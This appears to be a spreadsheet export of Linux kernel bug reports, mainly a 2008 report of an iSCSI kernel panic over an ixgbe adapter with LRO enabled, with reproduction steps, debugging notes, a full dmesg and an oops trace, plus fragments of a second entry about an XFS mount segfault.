    <t>Distribution: SuSE SLES 10.2 Hardware Environment: .config is available on request, we are using i686 arch, dell 2950, ixgbe adapter, inet_lro module. Software Environment: none/gnome-session running yast2 Problem Description: We found that just trying to connect with no authentication to an iSCSI target over an adapter running either the in-kernel LRO or an in-driver version will cause this panic. Steps to reproduce: in suse, start yast2 utility, find iscsi module, connect to iSCSI target using ixgbe driver with CONFIG_INET_LRO enabled. I did some debugging: I tried to debug down a ways but got lost in figuring out what the code was trying to do. I believe the bug is because the memcpy in iscsi_tcp_segment_recv faults. from looking at the debug messages below, skb_seq_read (only called by iSCSI) returns a negative value for avail, and a pointer value of 5a8 into &amp;ptr in the call at line 953: of iscsi_tcp.c I didn't figure out where in skb_seq_read returns the bogus data, I wanted to send this along now that I've found out this much. skb_seq_read appears to have the logic inside that it needs to handle LRO packets (data either in frags[] or frag_list) but something is wrong still. I turned on tcp_debug messages in iscsi_tcp.c, here is the log and panic. I believe the offsets in the function are slightly different than normal due to the inclusion of the debug printks. The normal panic is at BUG: unable to handle kernel NULL pointer dereference at 000005a8 IP: [&lt;f8de64b2&gt;] :iscsi_tcp:iscsi_tcp_recv+0x161/0x473 *pdpt = 0000000036533001 *pde = 0000000000000000 Oops: 0000 [#1] SMP Modules linked in: crc32c libcrc32c iscsi_tcp libiscsi scsi_transport_iscsi ixgbe netconsole inet_lro ipv6 af_packet button battery ac loop usbhid ff_memless ehci_hcd uhci_hcd usbcore dm_mod bnx2 ext3 jbd edd fan thermal processor thermal_sys sg megaraid_sas ata_piix libata dock piix sd_mod scsi_mod ide_disk ide_core [last unloaded: iscsi_tcp] Pid: 0, comm: swapper Not tainted (2.6.26-bigsmp #1) EIP: 0060:[&lt;f8de64b2&gt;] EFLAGS: 00010202 CPU: 3 EIP is at iscsi_tcp_recv+0x161/0x473 [iscsi_tcp] EAX: 0000002b EBX: f747dd48 ECX: 00000038 EDX: 00000000 ESI: 000005a8 EDI: f593db20 EBP: f751ca10 ESP: f747dd20 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process swapper (pid: 0, ti=f747c000 task=f745abe0 task.ti=f747c000) Stack: f8de78e7 000000e0 f446c0c0 f6c35544 f751ca00 000005a8 00000000 000000e0 000005a8 08745958 00000000 00000a88 00000000 000005a8 f446c0c0 f78ba0ac 00000000 c0289617 00000000 00000000 05a80001 00007fff f78ba040 000005a8 Call Trace: [&lt;c0289617&gt;] tcp_ack+0x15bd/0x1757 [&lt;c028391e&gt;] tcp_read_sock+0x8c/0x1e0 [&lt;f8de6351&gt;] iscsi_tcp_recv+0x0/0x473 [iscsi_tcp] [&lt;f8de716a&gt;] iscsi_tcp_data_ready+0x36/0x80 [iscsi_tcp] [&lt;c028d1a2&gt;] tcp_send_ack+0xab/0xaf [&lt;c028c02e&gt;] tcp_rcv_established+0x3b3/0x639 [&lt;c02909fb&gt;] tcp_v4_do_rcv+0x22/0x16f [&lt;c0292294&gt;] tcp_v4_rcv+0x512/0x562 [&lt;c027b921&gt;] ip_local_deliver_finish+0xb2/0x14a [&lt;c027b852&gt;] ip_rcv_finish+0x286/0x2a3 [&lt;f8ce9a93&gt;] packet_rcv_spkt+0xb6/0xbd [af_packet] [&lt;c0261889&gt;] netif_receive_skb+0x2d0/0x33b [&lt;f8afd5ca&gt;] lro_flush+0x314/0x340 [inet_lro] [&lt;f8afd636&gt;] lro_flush_all+0x1b/0x28 [inet_lro] [&lt;f8b410eb&gt;] ixgbe_clean_rx_irq+0x73b/0x850 [ixgbe] [&lt;f8b44183&gt;] ixgbe_clean_rxonly+0x53/0xd0 [ixgbe] [&lt;c0263521&gt;] net_rx_action+0x8a/0x152 [&lt;c0124c6e&gt;] __do_softirq+0x5d/0xc1 [&lt;c0124d04&gt;] do_softirq+0x32/0x36 [&lt;c010663a&gt;] do_IRQ+0x73/0x85 [&lt;c0109152&gt;] mwait_idle+0x0/0x32 [&lt;c0105143&gt;] common_interrupt+0x23/0x28 [&lt;c0109152&gt;] mwait_idle+0x0/0x32 [&lt;c0109181&gt;] mwait_idle+0x2f/0x32 [&lt;c0103535&gt;] cpu_idle+0x88/0x9c ======================= Code: 24 14 0f 46 44 24 14 89 44 24 14 50 68 e7 78 de f8 e8 2e b3 33 c7 8b 7d 08 03 7d 00 8b 4c 24 1c 8b 74 24 20 03 74 24 18 c1 e9 02 &lt;f3&gt; a5 8b 4c 24 1c 83 e1 03 74 02 f3 a4 8b 4c 24 1c 01 4c 24 18 EIP: [&lt;f8de64b2&gt;] iscsi_tcp_recv+0x161/0x473 [iscsi_tcp] SS:ESP 0068:f747dd20 Kernel panic - not syncing: Fatal exception in interrupt full dmesg with debug: console [netcon0] enabled netconsole: network logging started ixgbe: eth6: ixgbe_remove: complete ACPI: PCI interrupt for device 0000:0c:00.0 disabled ixgbe: Intel(R) 10 Gigabit PCI Express Network Driver - version 1.3.41-NAPI Copyright (c) 1999-2008 Intel Corporation. ACPI: PCI Interrupt 0000:0c:00.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:0c:00.0 to 64 ixgbe: 0000:0c:00.0: ixgbe_init_interrupt_scheme: Multiqueue Enabled: Rx Queue count = 4, Tx Queue count = 1 ixgbe: eth0: ixgbe_probe: (PCI Express:2.5Gb/s:Width x4) 00:1b:21:09:1b:44 ixgbe: eth0: ixgbe_probe: MAC: 1, PHY: 2 ixgbe: eth0: ixgbe_probe: PCI-Express bandwidth available for this card is not sufficient for optimal performance. ixgbe: eth0: ixgbe_probe: For optimal performance a x8 PCI-Express slot is required. ixgbe: eth0: ixgbe_probe: In-kernel LRO is enabled ixgbe: eth0: ixgbe_probe: Intel(R) 10 Gigabit Network Connection ADDRCONF(NETDEV_UP): eth6: link is not ready ixgbe: eth6: ixgbe_watchdog_task: NIC Link is Up 10 Gbps, Flow Control: None ADDRCONF(NETDEV_CHANGE): eth6: link becomes ready eth6: no IPv6 routers present Loading iSCSI transport class v2.0-869. iscsi: registered transport (tcp) iscsi: registered transport (tcp) scsi3 : iSCSI Initiator over TCP/IP tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: iscsi_tcp_send_linear_data_prepare(f751ca00, datalen=464) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 464 total_size 464 tcp: copied 0 0 size 464 xmit tcp: copied 0 464 size 464 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 464 total size 464 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 464 total size 464 tcp: in 380 bytes tcp: skb f446cb40 ptr=f446f854 avail=380 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x23 ahslen 0 datalen 331 tcp: skb f446cb40 ptr=f446f884 avail=332 tcp: copied 0 0 size 331 recv tcp: iscsi_tcp_segment_recv copying 331 tcp: copied 0 331 size 331 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 331 total size 331 tcp: consume 1 pad bytes tcp: iscsi_tcp_segment_recv copying 1 tcp: copied 0 1 size 1 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 332 total size 332 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 380 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: xmit 512 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 84 bytes tcp: skb f446ca80 ptr=f446f054 avail=84 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 36 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=36) tcp: skb f446ca80 ptr=f446f084 avail=36 tcp: copied 0 0 size 36 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 36 tcp: copied 0 36 size 36 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 36 total size 36 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 84 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 124 bytes tcp: skb f446c9c0 ptr=f6540854 avail=124 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 74 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=74) tcp: skb f446c9c0 ptr=f6540884 avail=76 tcp: copied 0 0 size 74 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 74 tcp: copied 0 74 size 74 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 74 total size 74 tcp: consume 2 pad bytes tcp: iscsi_tcp_segment_recv copying 2 tcp: copied 0 2 size 2 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 76 total size 76 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 124 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes scsi 3:0:0:0: Direct-Access SUN LCSM100_I 0670 PQ: 0 ANSI: 5 tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 48 bytes tcp: skb f446c900 ptr=f6540054 avail=48 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x21 ahslen 0 datalen 0 tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 48 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 56 bytes tcp: skb f446c840 ptr=f6541854 avail=56 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 8 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=8) tcp: skb f446c840 ptr=f6541884 avail=8 tcp: copied 0 0 size 8 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 8 tcp: copied 0 8 size 8 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 8 total size 8 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 56 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] 190421401 512-byte hardware sectors (97496 MB) tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 52 bytes tcp: skb f446c780 ptr=f6541054 avail=52 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 4 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=4) tcp: skb f446c780 ptr=f6541084 avail=4 tcp: copied 0 0 size 4 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 4 tcp: copied 0 4 size 4 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 4 total size 4 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 52 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] Write Protect is off sd 3:0:0:0: [sdb] Mode Sense: 77 00 10 08 tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 52 bytes tcp: skb f446c6c0 ptr=f6542854 avail=52 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 4 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=4) tcp: skb f446c6c0 ptr=f6542884 avail=4 tcp: copied 0 0 size 4 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 4 tcp: copied 0 4 size 4 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 4 total size 4 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 52 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 80 bytes tcp: skb f446c600 ptr=f6542054 avail=80 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 32 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=32) tcp: skb f446c600 ptr=f6542084 avail=32 tcp: copied 0 0 size 32 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 32 tcp: copied 0 32 size 32 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 32 total size 32 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 80 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] Write cache: enabled, read cache: enabled, supports DPO and FUA tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 48 bytes tcp: skb f446c540 ptr=f6543854 avail=48 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x21 ahslen 0 datalen 0 tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 48 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 56 bytes tcp: skb f446c480 ptr=f6543054 avail=56 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 8 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=8) tcp: skb f446c480 ptr=f6543084 avail=8 tcp: copied 0 0 size 8 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 8 tcp: copied 0 8 size 8 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 8 total size 8 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 56 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] 190421401 512-byte hardware sectors (97496 MB) tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 52 bytes tcp: skb f446c3c0 ptr=f6544854 avail=52 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 4 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=4) tcp: skb f446c3c0 ptr=f6544884 avail=4 tcp: copied 0 0 size 4 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 4 tcp: copied 0 4 size 4 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 4 total size 4 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 52 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] Write Protect is off sd 3:0:0:0: [sdb] Mode Sense: 77 00 10 08 tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 52 bytes tcp: skb f446c300 ptr=f6544054 avail=52 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 4 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=4) tcp: skb f446c300 ptr=f6544084 avail=4 tcp: copied 0 0 size 4 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 4 tcp: copied 0 4 size 4 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 4 total size 4 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 52 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 80 bytes tcp: skb f446c240 ptr=f6545854 avail=80 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 32 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=32) tcp: skb f446c240 ptr=f6545884 avail=32 tcp: copied 0 0 size 32 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 32 tcp: copied 0 32 size 32 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 32 total size 32 tcp: segment done tcp: iscsi_tcp_hdr_recv_prep(f751ca00) tcp: no more data avail. Consumed 80 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 48 total size 48 tcp: Header done. Next segment size 0 total_size 0 tcp: copied 0 0 size 0 xmit tcp: iscsi_tcp_segment_unmap f751cb4c tcp: total copied 0 total size 0 tcp: xmit 48 bytes sd 3:0:0:0: [sdb] Write cache: enabled, read cache: enabled, supports DPO and FUA sdb:&lt;6&gt;tcp: iscsi_tcp_send_hdr_prep(f751ca00) tcp: copied 0 0 size 48 xmit tcp: copied 0 48 size 48 xmit tcp: in 1448 bytes tcp: skb f446c180 ptr=f6545054 avail=1448 tcp: copied 0 0 size 48 recv tcp: iscsi_tcp_segment_recv copying 48 tcp: copied 0 48 size 48 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: total copied 48 total size 48 tcp: segment done tcp: opcode 0x25 ahslen 0 datalen 4096 tcp: iscsi_tcp_begin_data_in(f751ca00, offset=0, datalen=4096) tcp: skb f446c180 ptr=f6545084 avail=1400 tcp: copied 0 0 size 512 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 512 tcp: copied 0 512 size 512 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 512 total size 4096 tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 512 tcp: copied 0 512 size 512 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 1024 total size 4096 tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 376 tcp: copied 0 376 size 512 recv tcp: iscsi_tcp_segment_recv copied 1400 bytes tcp: no more data avail. Consumed 1448 tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: in 2696 bytes tcp: skb f446c0c0 ptr=f6546854 avail=1448 tcp: copied 376 0 size 512 recv tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 136 tcp: copied 376 136 size 512 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 1536 total size 4096 tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 512 tcp: copied 0 512 size 512 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 2048 total size 4096 tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 512 tcp: copied 0 512 size 512 recv tcp: iscsi_tcp_segment_unmap f751ca10 tcp: iscsi_tcp_segment_unmap valid tcp: total copied 2560 total size 4096 tcp: iscsi_tcp_segment_map recv f751ca10 tcp: iscsi_tcp_segment_recv copying 288 tcp: copied 0 288 size 512 recv tcp: iscsi_tcp_segment_recv copied 1448 bytes tcp: skb f446c0c0 ptr=000005a8 avail=141842776 tcp: copied 288 0 size 512 recv tcp: iscsi_tcp_segment_recv copying 224 BUG: unable to handle kernel NULL pointer dereference at 000005a8 IP: [&lt;f8de64b2&gt;] :iscsi_tcp:iscsi_tcp_recv+0x161/0x473 *pdpt = 0000000036533001 *pde = 0000000000000000 Oops: 0000 [#1] SMP Modules linked in: crc32c libcrc32c iscsi_tcp libiscsi scsi_transport_iscsi ixgbe netconsole inet_lro ipv6 af_packet button battery ac loop usbhid ff_memless ehci_hcd uhci_hcd usbcore dm_mod bnx2 ext3 jbd edd fan thermal processor thermal_sys sg megaraid_sas ata_piix libata dock piix sd_mod scsi_mod ide_disk ide_core [last unloaded: iscsi_tcp] Pid: 0, comm: swapper Not tainted (2.6.26-bigsmp #1) EIP: 0060:[&lt;f8de64b2&gt;] EFLAGS: 00010202 CPU: 3 EIP is at iscsi_tcp_recv+0x161/0x473 [iscsi_tcp] EAX: 0000002b EBX: f747dd48 ECX: 00000038 EDX: 00000000 ESI: 000005a8 EDI: f593db20 EBP: f751ca10 ESP: f747dd20 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process swapper (pid: 0, ti=f747c000 task=f745abe0 task.ti=f747c000) Stack: f8de78e7 000000e0 f446c0c0 f6c35544 f751ca00 000005a8 00000000 000000e0 000005a8 08745958 00000000 00000a88 00000000 000005a8 f446c0c0 f78ba0ac 00000000 c0289617 00000000 00000000 05a80001 00007fff f78ba040 000005a8 Call Trace: [&lt;c0289617&gt;] tcp_ack+0x15bd/0x1757 [&lt;c028391e&gt;] tcp_read_sock+0x8c/0x1e0 [&lt;f8de6351&gt;] iscsi_tcp_recv+0x0/0x473 [iscsi_tcp] [&lt;f8de716a&gt;] iscsi_tcp_data_ready+0x36/0x80 [iscsi_tcp] [&lt;c028d1a2&gt;] tcp_send_ack+0xab/0xaf [&lt;c028c02e&gt;] tcp_rcv_established+0x3b3/0x639 [&lt;c02909fb&gt;] tcp_v4_do_rcv+0x22/0x16f [&lt;c0292294&gt;] tcp_v4_rcv+0x512/0x562 [&lt;c027b921&gt;] ip_local_deliver_finish+0xb2/0x14a [&lt;c027b852&gt;] ip_rcv_finish+0x286/0x2a3 [&lt;f8ce9a93&gt;] packet_rcv_spkt+0xb6/0xbd [af_packet] [&lt;c0261889&gt;] netif_receive_skb+0x2d0/0x33b [&lt;f8afd5ca&gt;] lro_flush+0x314/0x340 [inet_lro] [&lt;f8afd636&gt;] lro_flush_all+0x1b/0x28 [inet_lro] [&lt;f8b410eb&gt;] ixgbe_clean_rx_irq+0x73b/0x850 [ixgbe] [&lt;f8b44183&gt;] ixgbe_clean_rxonly+0x53/0xd0 [ixgbe] [&lt;c0263521&gt;] net_rx_action+0x8a/0x152 [&lt;c0124c6e&gt;] __do_softirq+0x5d/0xc1 [&lt;c0124d04&gt;] do_softirq+0x32/0x36 [&lt;c010663a&gt;] do_IRQ+0x73/0x85 [&lt;c0109152&gt;] mwait_idle+0x0/0x32 [&lt;c0105143&gt;] common_interrupt+0x23/0x28 [&lt;c0109152&gt;] mwait_idle+0x0/0x32 [&lt;c0109181&gt;] mwait_idle+0x2f/0x32 [&lt;c0103535&gt;] cpu_idle+0x88/0x9c ======================= Code: 24 14 0f 46 44 24 14 89 44 24 14 50 68 e7 78 de f8 e8 2e b3 33 c7 8b 7d 08 03 7d 00 8b 4c 24 1c 8b 74 24 20 03 74 24 18 c1 e9 02 &lt;f3&gt; a5 8b 4c 24 1c 83 e1 03 74 02 f3 a4 8b 4c 24 1c 01 4c 24 18 EIP: [&lt;f8de64b2&gt;] iscsi_tcp_recv+0x161/0x473 [iscsi_tcp] SS:ESP 0068:f747dd20 Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>mounting XFS produces a segfault</t>
  </si>
  <si>
    <t>2.6.27-05577-g0cfd810-dirty</t>
  </si>
  <si>
    <t>2008-10-21 18:00 UTC</t>
  </si>
  <si>
    <t>Tiago Maluta</t>
  </si>
  <si>
    <t>2008-11-22 14:02 UTC</t>
  </si>
  <si>
